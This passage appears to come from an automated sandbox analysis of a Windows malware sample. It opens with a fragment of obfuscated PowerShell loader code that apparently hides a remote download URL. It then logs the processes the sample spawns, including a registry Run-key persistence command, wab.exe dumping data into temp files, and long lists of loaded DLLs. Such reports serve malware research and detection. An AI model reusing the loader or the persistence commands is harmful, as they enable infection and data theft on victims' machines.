b-MassAPentgUn,se RetnHa rt,nar ';$Renprisen=Bortledede 'ArthhKurdtCy,itRamppGabe:Hedt/ .ig/ anv8Flyt7 Hom.Extr1 ype2Pree1Fris.Bol 1Lovp0Post5Cott.Samm1P,th6 Ma 3 Dis/ dnSBefouFlinbTeoduA hemSandb,eapiSheelForgi,ishcPyntaNar lPar . MardSkufw Lemp Pos ';$Burgessdom=Bortledede 'W,ip>Til ';$Attackman=Bortledede 'Reisi,once,agaxR.gi ';$Robaades='Skjolddragerens';Oraklerne (Bortledede 'D.siS .pveTec.tColl-ElecC UnioBevinM.katL jle P,rnH.sht,rem Van,-RecuPTa taOvertMassh ,el Ro.dTSiou: Bru\TschtDesceProglPrefeE.ptfBarboSemirH,alb odiRenonS,rid erre rovlFremsOmkoe UdbnDgndsSagv.f rstSpirxResutLett I os-nonsV V,sa LoelSisbuFriteGain Exo$UndlRLithoDedibStttaLocoaSol,dResee FowsConv;sogg ');Oraklerne (Bortledede 'PlagiFor,f For D.to( OpvtTaste ChrsGrnstMid.- Forp EftaFas,t,tophArtu KoitTSt g:Ande\ CystS,are atalAflae.dmof,efioLnovrpantbex,si Vi.nLsepdSka eMalul Heas vege FornParas,ore.M.set CarxHiertAncr) P,e{FogeeTranxRaadikerntKirk}Syn,;Kase ');$Baetylic = Bortledede 'Kulte,ondcE,sahA atoTouc Nono% Stea VilpI tepGly d TroaT drtLi.ga Cen%gara\ ,igI FosdHyp.e DasaEighlMandoSvrtgGesjiStu.cCassaAr,plPeal1B ef4Rive3Si.n.Pab.cBaudhKla.oForr Ter& D,n&A.gl konveVrdicBabbhCompoNeoc S ta$ Sem ';Oraklerne (Bortledede '.ype$InfegB,atlFl,ko.ucubFritaEx.alGlo,:s moF ap,rCataoThyrg R kmVuggeAch,nVars=Vare( FrecmatemPistd and Spir/Ant.cDigi Pach$ F,rBProtaShine Cy t DepyCa,rlSelvi FagcSucc)Mora ');Oraklerne (Bortledede 'Pres$LykngBedalTapeoNakebTelpaSvvnlRaci:MorbDSmotiT pmsCplfpW seoUro.n Tope SkanStyrtFlyvetrskn Anch .reeFormdpappeUplenF ld=St,t$.mlgRMenieMi.enAmazp Ar,rgr niAmphsKrydeKug.nT,ng. mpsThrip Undl SeciPondtAf k(Spat$Rre.B KakuReflrKonsg .aleSi.asFa csBerrdSlanos,olmIsol),iat ');$Renprisen=$Disponentenheden[0];Oraklerne (Bortledede 'Ma t$Cherg SpalC.unoN.nebPrecaT.pclstoc:ForfSLevetFortaPrist KriiTitasForetUndei Chik BileXer,rO.ersGadm=NoniN SoreAutow,tan-UmagOMis.bloddj,tole .ufc BiltVill ReidSHotby emos ectunineCocomV.ka.AescNHalveFngstOmph.UnwiWSu,meS.yrbTetrCSlublDrggiJu teSJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Idealogical143.cho && echo $"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2496 --field-trial-handle=2420,i,2104451589269232737,4580126100320580491,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Straddlers" /t REG_EXPAND_SZ /d "%Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dtfhsudaxgbogptlufigqqhs"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nntztmoulottqvhpdqdzbdcbcgr"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nntztmoulottqvhpdqdzbdcbcgr"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nntztmoulottqvhpdqdzbdcbcgr"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qpystfyvzwmgskdtubpbdixslnjqax"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qpystfyvzwmgskdtubpbdixslnjqax"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qpystfyvzwmgskdtubpbdixslnjqax"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Straddlers" /t REG_EXPAND_SZ /d "%Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)"Jump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: slc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
